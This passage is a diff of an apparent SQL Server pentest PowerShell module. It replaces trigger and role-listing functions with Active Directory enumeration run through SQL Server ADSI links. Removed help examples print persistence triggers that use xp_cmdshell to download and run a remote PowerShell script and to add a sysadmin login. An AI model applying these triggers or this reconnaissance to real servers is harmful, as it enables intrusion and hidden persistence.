ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Domain to query.')] + [string]$TargetDomain, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] @@ -6527,179 +7979,212 @@ Function Get-SQLDatabaseRoleMember Begin { - # Table for output - $TblDatabaseRoleMembers = New-Object -TypeName System.Data.DataTable - - # Setup login filter - if ($PrincipalName) - { - $PrincipalNameFilter = " AND USER_NAME(member_principal_id) like '$PrincipalName'" - } - else + # set instance to local host by default + if(-not $Instance) { - $PrincipalNameFilter = '' + $Instance = $env:COMPUTERNAME } + } - # Setup role name - if ($RolePrincipalName) + Process + { + # Get the domain of the server + if($TargetDomain) { - $RolePrincipalNameFilter = " AND USER_NAME(role_principal_id) like '$RolePrincipalName'" + $Domain = $TargetDomain + }else{ + $Domain = Get-SQLServerInfo -SuppressVerbose -Instance $Instance -Username $Username -Password $Password | Select-Object DomainName -ExpandProperty DomainName } - else - { - $RolePrincipalNameFilter = '' + $DomainDistinguishedName = Get-SQLDomainObject -SuppressVerbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapPath "$Domain" -LdapFilter "(name=$Domain)" -LdapFields 'distinguishedname' -UseAdHoc | Select-Object distinguishedname -ExpandProperty distinguishedname + + # Call Get-SQLDomainObject + if($UseAdHoc){ + Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapFilter "(objectCategory=subnet)" -LdapPath "$Domain/CN=Sites,CN=Configuration,$DomainDistinguishedName" -LdapFields 'name,distinguishedname,siteobject,whencreated,whenchanged,location' -UseAdHoc + }else{ + Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapFilter "(objectCategory=subnet)" -LdapPath "$Domain/CN=Sites,CN=Configuration,$DomainDistinguishedName" -LdapFields 'name,distinguishedname,siteobject,whencreated,whenchanged,location' } } - Process + End { - # Note: Tables queried by this function typically require sysadmin or DBO privileges. + } +} - # Parse computer name from the instance - $ComputerName = Get-ComputerNameFromInstance -Instance $Instance - # Default connection to local default instance - if(-not $Instance) - { - $Instance = $env:COMPUTERNAME - } +# ---------------------------------- +# Get-SQLDomainSite +# ---------------------------------- +# Author: Scott Sutherland, Thomas Elling +Function Get-SQLDomainSite +{ + <# + .SYNOPSIS + Using the OLE DB ADSI provider, query Active Directory for a list of domain sites + via the domain logon server associated with the SQL Server. This can be + done using a SQL Server link (OpenQuery) or AdHoc query (OpenRowset). Use the -UseAdHoc + flag to switch between modes. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER LinkUsername + Domain account used to authenticate to LDAP through SQL Server ADSI link. + .PARAMETER LinkPassword + Domain account password used to authenticate to LDAP through SQL Server ADSI link. + .PARAMETER UseAdHoc + Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER TargetDomain + Domain to query. + .EXAMPLE + PS C:\> Get-SQLDomainComputer -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc + .EXAMPLE + PS C:\> Get-SQLDomainComputer -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -LinkUsername 'domain\user' -LinkPassword 'Password123!' + .EXAMPLE + PS C:\> Get-SQLDomainComputer -Instance SQLServer1\STANDARDDEV2014 -Verbose + .EXAMPLE + PS C:\> Get-SQLDomainComputer -Instance SQLServer1\STANDARDDEV2014 -Verbose -LinkUsername 'domain\user' -LinkPassword 'Password123!' + .EXAMPLE + PS C:\> Get-SQLInstanceLocal | Get-SQLDomainComputer -Verbose + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate to SQL Server.')] + [string]$Username, - # Test connection to instance - $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { - $_.Status -eq 'Accessible' - } - if($TestConnection) - { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Connection Success." - } - } - else - { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Connection Failed." - } - return - } + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate to SQL Server.')] + [string]$Password, - # Get list of databases - if($NoDefaults) - { - $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -NoDefaults -SuppressVerbose - } - else - { - $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -SuppressVerbose - } + [Parameter(Mandatory = $false, + HelpMessage = 'Domain account used to authenticate to LDAP through SQL Server ADSI link.')] + [string]$LinkUsername, - # Get roles for each database - $TblDatabases | - ForEach-Object -Process { - # Get database name - $DbName = $_.DatabaseName + [Parameter(Mandatory = $false, + HelpMessage = 'Domain account password used to authenticate to LDAP through SQL Server ADSI link.')] + [string]$LinkPassword, - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Getting role members for the $DbName database..." - } + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, - # Define Query - $Query = " USE $DbName; - SELECT '$ComputerName' as [ComputerName], - '$Instance' as [Instance], - '$DbName' as [DatabaseName], - role_principal_id as [RolePrincipalId], - USER_NAME(role_principal_id) as [RolePrincipalName], - member_principal_id as [PrincipalId], - USER_NAME(member_principal_id) as [PrincipalName] - FROM [$DbName].[sys].[database_role_members] - WHERE 1=1 - $RolePrincipalNameFilter - $PrincipalNameFilter" + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, - # Execute Query - $TblDatabaseRoleMembersTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + [Parameter(Mandatory = $false, + HelpMessage = 'Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet.')] + [Switch]$UseAdHoc, - # Append results - $TblDatabaseRoleMembers = $TblDatabaseRoleMembers + $TblDatabaseRoleMembersTemp + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Domain to query.')] + [string]$TargetDomain, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # set instance to local host by default + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + } + + Process + { + # Get the domain of the server + if($TargetDomain) + { + $Domain = $TargetDomain + }else{ + $Domain = Get-SQLServerInfo -SuppressVerbose -Instance $Instance -Username $Username -Password $Password | Select-Object DomainName -ExpandProperty DomainName + } + $DomainDistinguishedName = Get-SQLDomainObject -SuppressVerbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapPath "$Domain" -LdapFilter "(name=$Domain)" -LdapFields 'distinguishedname' -UseAdHoc | Select-Object distinguishedname -ExpandProperty distinguishedname + + # Call Get-SQLDomainObject + if($UseAdHoc){ + Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapFilter "(objectCategory=site)" -LdapPath "$Domain/CN=Sites,CN=Configuration,$DomainDistinguishedName" -LdapFields 'name,distinguishedname,whencreated,whenchanged' -UseAdHoc + }else{ + Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapFilter "(objectCategory=site)" -LdapPath "$Domain/CN=Sites,CN=Configuration,$DomainDistinguishedName" -LdapFields 'name,distinguishedname,whencreated,whenchanged' } } End { - # Return data - $TblDatabaseRoleMembers } } # ---------------------------------- -# Get-SQLTriggerDdl +# Get-SQLDomainComputer # ---------------------------------- -# Author: Scott Sutherland -Function Get-SQLTriggerDdl +# Author: Scott Sutherland, Thomas Elling +Function Get-SQLDomainComputer { <# .SYNOPSIS - Returns DDL trigger information from target SQL Servers. This includes logon triggers. + Using the OLE DB ADSI provider, query Active Directory for a list of domain computers + via the domain logon server associated with the SQL Server. This can be + done using a SQL Server link (OpenQuery) or AdHoc query (OpenRowset). Use the -UseAdHoc + flag to switch between modes. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. + .PARAMETER LinkUsername + Domain account used to authenticate to LDAP through SQL Server ADSI link. + .PARAMETER LinkPassword + Domain account password used to authenticate to LDAP through SQL Server ADSI link. + .PARAMETER UseAdHoc + Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. - .PARAMETER TriggerName - Trigger name to filter for. + .PARAMETER TargetDomain + Domain to query. + .PARAMETER FilterComputer + Domain computer to filter for. .EXAMPLE - PS C:\> Get-SQLTriggerDdl -Instance SQLServer1\STANDARDDEV2014 - - ComputerName : SQLServer1 - Instance : SQLServer1\STANDARDDEV2014 - TriggerName : persistence_ddl_1 - TriggerId : 1104722988 - TriggerType : SERVER - ObjectType : SQL_TRIGGER - ObjectClass : SERVER - TriggerDefinition : -- Create the DDL trigger - CREATE Trigger [persistence_ddl_1] - ON ALL Server - FOR DDL_LOGIN_EVENTS - AS - - -- Download and run a PowerShell script from the internet - EXEC master..xp_cmdshell 'Powershell -c "IEX(new-object - net.webclient).downloadstring(''https://raw.githubusercontent.com/nullbind/Powershellery/master/Brainstorming/trigger_demo_ddl.ps1'')"'; - - -- Add a sysadmin named 'SysAdmin_DDL' if it doesn't exist - if (SELECT count(name) FROM sys.sql_logins WHERE name like 'SysAdmin_DDL') = 0 - - -- Create a login - CREATE LOGIN SysAdmin_DDL WITH PASSWORD = 'Password123!'; - - -- Add the login to the sysadmin fixed server role - EXEC sp_addsrvrolemember 'SysAdmin_DDL', 'sysadmin'; - - create_date : 4/26/2016 8:34:49 PM - modify_date : 4/26/2016 8:34:49 PM - is_ms_shipped : False - is_disabled : False + PS C:\> Get-SQLDomainComputer -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc .EXAMPLE - PS C:\> Get-SQLInstanceDomain | Get-SQLTriggerDdl -Verbose + PS C:\> Get-SQLDomainComputer -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -LinkUsername 'domain\user' -LinkPassword 'Password123!' + .EXAMPLE + PS C:\> Get-SQLDomainComputer -Instance SQLServer1\STANDARDDEV2014 -Verbose + .EXAMPLE + PS C:\> Get-SQLDomainComputer -Instance SQLServer1\STANDARDDEV2014 -Verbose -LinkUsername 'domain\user' -LinkPassword 'Password123!' + .EXAMPLE + PS C:\> Get-SQLInstanceLocal | Get-SQLDomainComputer -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, - HelpMessage = 'SQL Server or domain account to authenticate with.')] + HelpMessage = 'SQL Server or domain account to authenticate to SQL Server.')] [string]$Username, [Parameter(Mandatory = $false, - HelpMessage = 'SQL Server or domain account password to authenticate with.')] + HelpMessage = 'SQL Server or domain account password to authenticate to SQL Server.')] [string]$Password, + [Parameter(Mandatory = $false, + HelpMessage = 'Domain account used to authenticate to LDAP through SQL Server ADSI link.')] + [string]$LinkUsername, + + [Parameter(Mandatory = $false, + HelpMessage = 'Domain account password used to authenticate to LDAP through SQL Server ADSI link.')] + [string]$LinkPassword, + [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] @@ -6712,8 +8197,17 @@ Function Get-SQLTriggerDdl [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Trigger name.')] - [string]$TriggerName, + HelpMessage = 'Domain computer to filter for.')] + [string]$FilterComputer, + + [Parameter(Mandatory = $false, + HelpMessage = 'Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet.')] + [Switch]$UseAdHoc, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Domain to query.')] + [string]$TargetDomain, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] @@ -6722,156 +8216,90 @@ Function Get-SQLTriggerDdl Begin { - # Table for output - $TblDdlTriggers = New-Object -TypeName System.Data.DataTable - - # Setup role name - if ($TriggerName) + # set instance to local host by default + if(-not $Instance) { - $TriggerNameFilter = " AND name like '$TriggerName'" + $Instance = $env:COMPUTERNAME } - else - { - $TriggerNameFilter = '' + + # Setup computer filter + if((-not $FilterComputer)){ + $FilterComputer = '*' } } Process { - # Note: Tables queried by this function typically require sysadmin privileges to get all rows. - - # Parse computer name from the instance - $ComputerName = Get-ComputerNameFromInstance -Instance $Instance - - # Default connection to local default instance - if(-not $Instance) - { - $Instance = $env:COMPUTERNAME - } - - # Test connection to instance - $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { - $_.Status -eq 'Accessible' - } - if($TestConnection) - { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Connection Success." - } - } - else - { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Connection Failed." - } - return + # Call Get-SQLDomainObject + if($UseAdHoc){ + Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapPath $TargetDomain -LdapFilter "(&(objectCategory=Computer)(SamAccountName=$FilterComputer))" -LdapFields 'samaccountname,dnshostname,operatingsystem,operatingsystemversion,operatingSystemServicePack,whencreated,whenchanged,adspath' -UseAdHoc + }else{ + Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapPath $TargetDomain -LdapFilter "(&(objectCategory=Computer)(SamAccountName=$FilterComputer))" -LdapFields 'samaccountname,dnshostname,operatingsystem,operatingsystemversion,operatingSystemServicePack,whencreated,whenchanged,adspath' } - - # Define Query - $Query = " SELECT '$ComputerName' as [ComputerName], - '$Instance' as [Instance], - name as [TriggerName], - object_id as [TriggerId], - [TriggerType] = 'SERVER', - type_desc as [ObjectType], - parent_class_desc as [ObjectClass], - OBJECT_DEFINITION(OBJECT_ID) as [TriggerDefinition], - create_date, - modify_date, - is_ms_shipped, - is_disabled - FROM [master].[sys].[server_triggers] WHERE 1=1 - $TriggerNameFilter" - - # Execute Query - $TblDdlTriggersTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose - - # Append results - $TblDdlTriggers = $TblDdlTriggers + $TblDdlTriggersTemp } End { - # Return data - $TblDdlTriggers } } - # ---------------------------------- -# Get-SQLTriggerDml +# Get-SQLDomainOu # ---------------------------------- # Author: Scott Sutherland -Function Get-SQLTriggerDml +Function Get-SQLDomainOu { <# .SYNOPSIS - Returns DML trigger information from target SQL Servers. + Using the OLE DB ADSI provider, query Active Directory for a list of domain organization units (ou) + via the domain logon server associated with the SQL Server. This can be + done using a SQL Server link (OpenQuery) or AdHoc query (OpenRowset). Use the -UseAdHoc + flag to switch between modes. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. + .PARAMETER LinkUsername + Domain account used to authenticate to LDAP through SQL Server ADSI link. + .PARAMETER LinkPassword + Domain account password used to authenticate to LDAP through SQL Server ADSI link. + .PARAMETER UseAdHoc + Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. - .PARAMETER DatabaseName - Database name to filter for. - .PARAMETER TriggerName - Trigger name to filter for. + .PARAMETER TargetDomain + Domain to query. .EXAMPLE - PS C:\> Get-SQLTriggerDml -Instance SQLServer1\STANDARDDEV2014 -DatabaseName testdb - - ComputerName : SQLServer1 - Instance : SQLServer1\STANDARDDEV2014 - DatabaseName : testdb - TriggerName : persistence_dml_1 - TriggerId : 565577053 - TriggerType : DATABASE - ObjectType : SQL_TRIGGER - ObjectClass : OBJECT_OR_COLUMN - TriggerDefinition : -- Create trigger - CREATE TRIGGER [persistence_dml_1] - ON testdb.dbo.NOCList - FOR INSERT, UPDATE, DELETE AS - - -- Impersonate sa - EXECUTE AS LOGIN = 'sa' - - -- Download a PowerShell script from the internet to memory and execute it - EXEC master..xp_cmdshell 'Powershell -c "IEX(new-object - net.webclient).downloadstring(''https://raw.githubusercontent.com/nullbind/Powershellery/master/Brainstorming/trigger_demo_dml.ps1'')"'; - - -- Add a sysadmin named 'SysAdmin_DML' if it doesn't exist - if (select count(*) from sys.sql_logins where name like 'SysAdmin_DML') = 0 - - -- Create a login - CREATE LOGIN SysAdmin_DML WITH PASSWORD = 'Password123!'; - - -- Add the login to the sysadmin fixed server role - EXEC sp_addsrvrolemember 'SysAdmin_DML', 'sysadmin'; - - create_date : 4/26/2016 8:58:28 PM - modify_date : 4/26/2016 8:58:28 PM - is_ms_shipped : False - is_disabled : False - is_not_for_replication : False - is_instead_of_trigger : False + PS C:\> Get-SQLDomainOu -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc .EXAMPLE - PS C:\> Get-SQLInstanceDomain | Get-SQLTriggerDml -Verbose + PS C:\> Get-SQLDomainOu -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -LinkUsername 'domain\user' -LinkPassword 'Password123!' + .EXAMPLE + PS C:\> Get-SQLDomainOu -Instance SQLServer1\STANDARDDEV2014 -Verbose + .EXAMPLE + PS C:\> Get-SQLDomainOu -Instance SQLServer1\STANDARDDEV2014 -Verbose -LinkUsername 'domain\user' -LinkPassword 'Password123!' + .EXAMPLE + PS C:\> Get-SQLInstanceLocal | Get-SQLDomainOu -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, - HelpMessage = 'SQL Server or domain account to authenticate with.')] + HelpMessage = 'SQL Server or domain account to authenticate to SQL Server.')] [string]$Username, [Parameter(Mandatory = $false, - HelpMessage = 'SQL Server or domain account password to authenticate with.')] + HelpMessage = 'SQL Server or domain account password to authenticate to SQL Server.')] [string]$Password, + [Parameter(Mandatory = $false, + HelpMessage = 'Domain account used to authenticate to LDAP through SQL Server ADSI link.')] + [string]$LinkUsername, + + [Parameter(Mandatory = $false, + HelpMessage = 'Domain account password used to authenticate to LDAP through SQL Server ADSI link.')] + [string]$LinkPassword, + [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] @@ -6883,14 +8311,13 @@ Function Get-SQLTriggerDml [string]$Instance, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'SQL Server database name.')] - [string]$DatabaseName, + HelpMessage = 'Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet.')] + [Switch]$UseAdHoc, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Trigger name.')] - [string]$TriggerName, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Domain to query.')] + [string]$TargetDomain, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] @@ -6899,157 +8326,87 @@ Function Get-SQLTriggerDml Begin { - # Table for output - $TblDmlTriggers = New-Object -TypeName System.Data.DataTable - - # Setup login filter - if ($TriggerName) - { - $TriggerNameFilter = " AND name like '$TriggerName'" - } - else + # set instance to local host by default + if(-not $Instance) { - $TriggerNameFilter = '' + $Instance = $env:COMPUTERNAME } } Process { - # Note: Tables queried by this function typically require sysadmin privileges to get all rows. - - # Parse computer name from the instance - $ComputerName = Get-ComputerNameFromInstance -Instance $Instance - - # Default connection to local default instance - if(-not $Instance) - { - $Instance = $env:COMPUTERNAME - } - - # Test connection to instance - $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { - $_.Status -eq 'Accessible' - } - if($TestConnection) - { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Connection Success." - Write-Verbose -Message "$Instance : Grabbing DML triggers from the databases below:." - } - } - else - { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Connection Failed." - } - return - } - - # Get list of databases - $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -HasAccess -DatabaseName $DatabaseName -SuppressVerbose - - # Get role for each database - $TblDatabases | - ForEach-Object -Process { - # Get database name - $DbName = $_.DatabaseName - - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : - $DbName" - } - - # Define Query - $Query = " use [$DbName]; - SELECT '$ComputerName' as [ComputerName], - '$Instance' as [Instance], - '$DbName' as [DatabaseName], - name as [TriggerName], - object_id as [TriggerId], - [TriggerType] = 'DATABASE', - type_desc as [ObjectType], - parent_class_desc as [ObjectClass], - OBJECT_DEFINITION(OBJECT_ID) as [TriggerDefinition], - create_date, - modify_date, - is_ms_shipped, - is_disabled, - is_not_for_replication, - is_instead_of_trigger - FROM [$DbName].[sys].[triggers] WHERE 1=1 - $TriggerNameFilter" - - # Execute Query - $TblDmlTriggersTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose - - # Append results - $TblDmlTriggers = $TblDmlTriggers + $TblDmlTriggersTemp + # Call Get-SQLDomainObject + if($UseAdHoc){ + Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapPath $TargetDomain -LdapFilter '(objectCategory=organizationalUnit)' -LdapFields 'name,distinguishedname,adspath,instancetype,whencreated,whenchanged' -UseAdHoc + }else{ + Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapPath $TargetDomain -LdapFilter '(objectCategory=organizationalUnit)' -LdapFields 'name,distinguishedname,adspath,instancetype,whencreated,whenchanged' } } End - { - # Return data - $TblDmlTriggers + { } } # ---------------------------------- -# Get-SQLStoredProcedure +# Get-SQLDomainAccountPolicy # ---------------------------------- -# Author: Scott Sutherland -Function Get-SQLStoredProcedure +# Author: Scott Sutherland, Thomas Elling +# Reference: https://msdn.microsoft.com/en-us/library/ms682204(v=vs.85).aspx +Function Get-SQLDomainAccountPolicy { <# .SYNOPSIS - Returns stored procedures from target SQL Servers. - Note: Viewing procedure definitions requires the sysadmin role or the VIEW DEFINITION permission. + Using the OLE DB ADSI provider, query Active Directory for a list of domain account policies + via the domain logon server associated with the SQL Server. This can be + done using a SQL Server link (OpenQuery) or AdHoc query (OpenRowset). Use the -UseAdHoc + flag to switch between modes. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. + .PARAMETER LinkUsername + Domain account used to authenticate to LDAP through SQL Server ADSI link. + .PARAMETER LinkPassword + Domain account password used to authenticate to LDAP through SQL Server ADSI link. + .PARAMETER UseAdHoc + Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. - .PARAMETER DatabaseName - Database name to filter for. - .PARAMETER ProcedureName - Procedure name to filter for. - .PARAMETER NoDefaults - Filter out results from default databases. + .PARAMETER TargetDomain + Domain to query. .EXAMPLE - PS C:\> Get-SQLStoredProcure -Instance SQLServer1\STANDARDDEV2014 -NoDefaults -DatabaseName testdb - - ComputerName : SQLServer1 - Instance : SQLServer1\STANDARDDEV2014 - DatabaseName : testdb - SchemaName : dbo - ProcedureName : MyTestProc - ProcedureType : PROCEDURE - ProcedureDefinition : CREATE PROC MyTestProc - WITH EXECUTE AS OWNER - as - begin - select SYSTEM_USER as currentlogin, ORIGINAL_LOGIN() as originallogin - end + PS C:\> Get-SQLDomainAccountPolicy -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc .EXAMPLE - PS C:\> Get-SQLInstanceDomain | Get-SQLStoredProcure -Verbose -NoDefaults + PS C:\> Get-SQLDomainAccountPolicy -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -LinkUsername 'domain\user' -LinkPassword 'Password123!' + .EXAMPLE + PS C:\> Get-SQLDomainAccountPolicy -Instance SQLServer1\STANDARDDEV2014 -Verbose + .EXAMPLE + PS C:\> Get-SQLDomainAccountPolicy -Instance SQLServer1\STANDARDDEV2014 -Verbose -LinkUsername 'domain\user' -LinkPassword 'Password123!' + .EXAMPLE + PS C:\> Get-SQLInstanceLocal | Get-SQLDomainAccountPolicy -Verbose #> - [CmdletBinding()] Param( [Parameter(Mandatory = $false, - HelpMessage = 'SQL Server or domain account to authenticate with.')] + HelpMessage = 'SQL Server or domain account to authenticate to SQL Server.')] [string]$Username, [Parameter(Mandatory = $false, - HelpMessage = 'SQL Server or domain account password to authenticate with.')] + HelpMessage = 'SQL Server or domain account password to authenticate to SQL Server.')] [string]$Password, + [Parameter(Mandatory = $false, + HelpMessage = 'Domain account used to authenticate to LDAP through SQL Server ADSI link.')] + [string]$LinkUsername, + + [Parameter(Mandatory = $false, + HelpMessage = 'Domain account password used to authenticate to LDAP through SQL Server ADSI link.')] + [string]$LinkPassword, + [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] @@ -7061,18 +8418,14 @@ Function Get-SQLStoredProcedure [string]$Instance, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'SQL Server database name.')] - [string]$DatabaseName, + HelpMessage = 'Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet.')] + [Switch]$UseAdHoc, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'Trigger name.')] - [string]$ProcedureName, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Domain to query.')] + [string]$TargetDomain, - [Parameter(Mandatory = $false, - HelpMessage = "Don't select tables from default databases.")] - [switch]$NoDefaults, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] @@ -7081,165 +8434,119 @@ Function Get-SQLStoredProcedure Begin { - # Table for output - $TblProcs = New-Object -TypeName System.Data.DataTable - - # Setup login filter - if ($ProcedureName) - { - $ProcedureNameFilter = " AND ROUTINE_NAME like '$ProcedureName'" - } - else + # set instance to local host by default + if(-not $Instance) { - $ProcedureNameFilter = '' + $Instance = $env:COMPUTERNAME } + + # Create table for results + $TableAccountPolicy = New-Object System.Data.DataTable + $TableAccountPolicy.Columns.Add("pwdhistorylength") | Out-Null + $TableAccountPolicy.Columns.Add("lockoutthreshold") | Out-Null + $TableAccountPolicy.Columns.Add("lockoutduration") | Out-Null + $TableAccountPolicy.Columns.Add("lockoutobservationwindow") | Out-Null + $TableAccountPolicy.Columns.Add("minpwdlength") | Out-Null + $TableAccountPolicy.Columns.Add("minpwdage") | Out-Null + $TableAccountPolicy.Columns.Add("pwdproperties") | Out-Null + $TableAccountPolicy.Columns.Add("whenchanged") | Out-Null + $TableAccountPolicy.Columns.Add("gplink") | Out-Null } Process { - # Parse ComputerName - If ($Instance) - { - $ComputerName = $Instance.split('\')[0].split(',')[0] - $Instance = $Instance - } - else - { - $ComputerName = $env:COMPUTERNAME - $Instance = '.\' - } - - # Test connection to instance - $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { - $_.Status -eq 'Accessible' - } - if($TestConnection) - { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Connection Success." - Write-Verbose -Message "$Instance : Grabbing stored procedures from databases below:" - } - } - else - { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Connection Failed." - } - return - } - - # Setup NoDefault filter - if($NoDefaults) - { - # Get list of databases - $TblDatabases = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DatabaseName $DatabaseName -HasAccess -NoDefaults -SuppressVerbose + # Call Get-SQLDomainObject + if($UseAdHoc){ + $Results = Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapPath $TargetDomain -LdapFilter '(objectClass=domainDNS)' -LdapFields 'pwdhistorylength,lockoutthreshold,lockoutduration,lockoutobservationwindow,minpwdlength,minpwdage,pwdproperties,whenchanged,gplink' -UseAdHoc + }else{ + $Results = Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapPath $TargetDomain -LdapFilter '(objectClass=domainDNS)' -LdapFields 'pwdhistorylength,lockoutthreshold,lockoutduration,lockoutobservationwindow,minpwdlength,minpwdage,pwdproperties,whenchanged,gplink' } - else - { - # Get list of databases - $TblDatabases = Get-SQLDatabase -Instance 